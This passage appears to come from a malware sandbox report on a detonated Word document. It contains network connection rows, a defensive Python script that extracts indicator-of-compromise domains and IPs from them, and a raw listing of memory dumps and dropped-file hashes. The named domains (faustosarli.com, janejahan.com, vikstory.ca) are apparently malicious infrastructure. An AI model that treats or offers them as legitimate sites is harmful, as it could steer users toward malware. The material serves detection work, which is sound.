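US 8.8.8.8:53 faustosarli.com udp
US 172.67.190.216:80 faustosarli.com tcp
US 8.8.8.8:53 www.faustosarli.com udp
US 172.67.190.216:443 www.faustosarli.com tcp
US 8.8.8.8:53 janejahan.com udp
US 76.223.54.146:80 janejahan.com tcp
US 8.8.8.8:53 vikstory.ca udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
"""

RESOLVER = "8.8.8.8:53"  # the sandbox's DNS server, as seen in every udp row
# Assumption: domains Word and the sandbox contact on their own; tune per image.
NOISE_DOMAINS = ("in-addr.arpa", "officeapps.live.com", "cdn.office.net")

Row = Tuple[str, str, str, str]


def parse_rows(text: str) -> List[Row]:
    """Parse the report's four-column rows; header and malformed lines are skipped."""
    rows: List[Row] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0] == "Country":
            continue
        rows.append((parts[0], parts[1], parts[2], parts[3]))
    return rows


def is_noise(domain: str) -> bool:
    """True for reverse lookups and Office's own service/CDN hostnames."""
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in NOISE_DOMAINS)


def summarise(rows: List[Row]) -> Dict[str, dict]:
    """Per domain: whether a DNS query was seen and which (ip:port, proto) were contacted."""
    summary: Dict[str, dict] = defaultdict(lambda: {"dns": False, "connections": set()})
    for _country, dest, domain, proto in rows:
        entry = summary[domain.lower()]
        if dest == RESOLVER and proto == "udp":
            entry["dns"] = True
        else:
            entry["connections"].add((dest, proto))
    return dict(summary)


def iocs(rows: List[Row]) -> Dict[str, List[str]]:
    """Split sample-attributable domains into contacted vs. lookup-only, plus IPs."""
    attr = {d: v for d, v in summarise(rows).items() if not is_noise(d)}
    return {
        "contacted": sorted(d for d, v in attr.items() if v["connections"]),
        "lookup_only": sorted(d for d, v in attr.items() if not v["connections"]),
        "ips": sorted({dest.split(":")[0] for v in attr.values() for dest, _ in v["connections"]}),
    }


def run_demo() -> Dict[str, List[str]]:
    """IOC summary for the rows embedded above."""
    return iocs(parse_rows(NETWORK_ROWS))


if __name__ == "__main__":
    for kind, values in run_demo().items():
        print(f"{kind}: {', '.join(values) or '-'}")
```

Feed the full behavioral2 table through parse_rows and the output is the same three contacted domains and the same two lookup-only-plus-vikstory.ca set, with the Office CDN and reverse-lookup rows discarded; the differing destination addresses for faustosarli.com and janejahan.com between the two detonations are one more reason to block on domain rather than on IP.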

Files

memory/4764-1-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-0-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4764-3-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-2-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-5-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-4-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-8-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-10-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-12-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-13-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-14-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-15-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-16-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-17-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

memory/4764-11-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-9-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-7-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-6-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-18-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\70F12C09.wmf

MD5 ba78b6a04f23bba2f52269219d1e49d3
SHA1 cbcb8d8bba5f2d6651cda32fe925cfacb21aed6a
SHA256 c605593939ebe703f8829e168f26e084126efdaa5806d849b9a6ce4b6d1d3670
SHA512 1c622f5aaacee45a89d97d46db029ab17a1093b83f675363717975d8306639a0d9c9c4897026e0c7479019c6b41a0ff5e180ab9ba6b945817a86b4ccbe7991c7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpaeulnx.qlp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-60-0x000002AF7FD80000-0x000002AF7FDA2000-memory.dmp

memory/4764-72-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-73-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4764-74-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-75-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 2a383cfc727e47795f091ce927ba9495
SHA1 9a02a467edd34be420e3e3bcd9bcb1366b8c8ed0
SHA256 8a063babb8975104a85ae7da360ceeb5114470c9c812a3536fb83a726ebf4328
SHA512 837cd3bde250ffe4f172a371c7f9e4c859627fe703e4c98d2c2429cf713fc72b5fb2466e8dc9868e299a3dd43322bb731d81a536eb550bf1874323915ed8f664

C:\Users\Admin\AppData\Local\Temp\TCD2E3.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810